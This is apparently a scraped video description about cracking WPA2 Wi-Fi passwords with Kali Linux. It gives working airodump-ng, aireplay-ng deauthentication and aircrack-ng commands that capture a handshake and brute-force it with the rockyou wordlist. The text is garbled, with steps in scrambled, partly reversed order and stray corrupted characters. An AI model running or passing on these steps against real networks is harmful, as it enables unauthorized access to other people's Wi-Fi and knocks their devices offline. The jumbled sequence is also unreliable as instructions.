

Now networks with high security don’t allow more than 5 or 10 entries before locking themselves up, but normal Wi-FI networks in our homes and our offices allow an unlimited number of tries for entering a password so a brute force attack can be successfully carried out. It is the way passcodes, passwords, and kill codes are found with the help of continuous permutations using all kinds of keywords possible. Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended.Most of you would have heard about a brute-force attack. !Replace hack1-01.cap with your file nameĪircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt !Make sure you have rockyou in text format (unzip file on Kali) !Crack file with Rock you or another wordlist Sudo aireplay-ng –deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon !Make sure you replace the bssid with your own Sudo airodump-ng -w hack1 -c 2 –bssid 90:9A:4A:B8:F3:FB wlan0mon

!Replace hack1 with your file name like capture1 or something !Make sure you replace the channel number and bssid with your own ! AP-MAC & channel – you need to select your own here: !You could also use iwconfig to check that interface is in monitor mode: Put interface back into managed mode: 9:30Ĭrack WPA2 password with aircrack-ng: 10:10 Use Wireshark to view WPA2 four way handshake: 8:38 Use aireplay-ng to deauthenticate clients: 7:25 Use airodump-ng to view only one network: 6:20Ĭonnect to network using an iPhone: 6:39Īirodump-ng capture WPA2 four way handshake: 6:58 Kill conflicting processes with airmon-ng: 3:55ĭiscover WiFi Networks with airodump-ng: 5:15 Verify that network adapter is recognized by Kali Linux: 2:04 Use airmon-ng to crack WiFi networks: 0:00 I discuss network adapters, airmon-ng, airodump-ng, aircrack-ng and more in this video. Full process using Kali Linux to crack WiFi passwords.
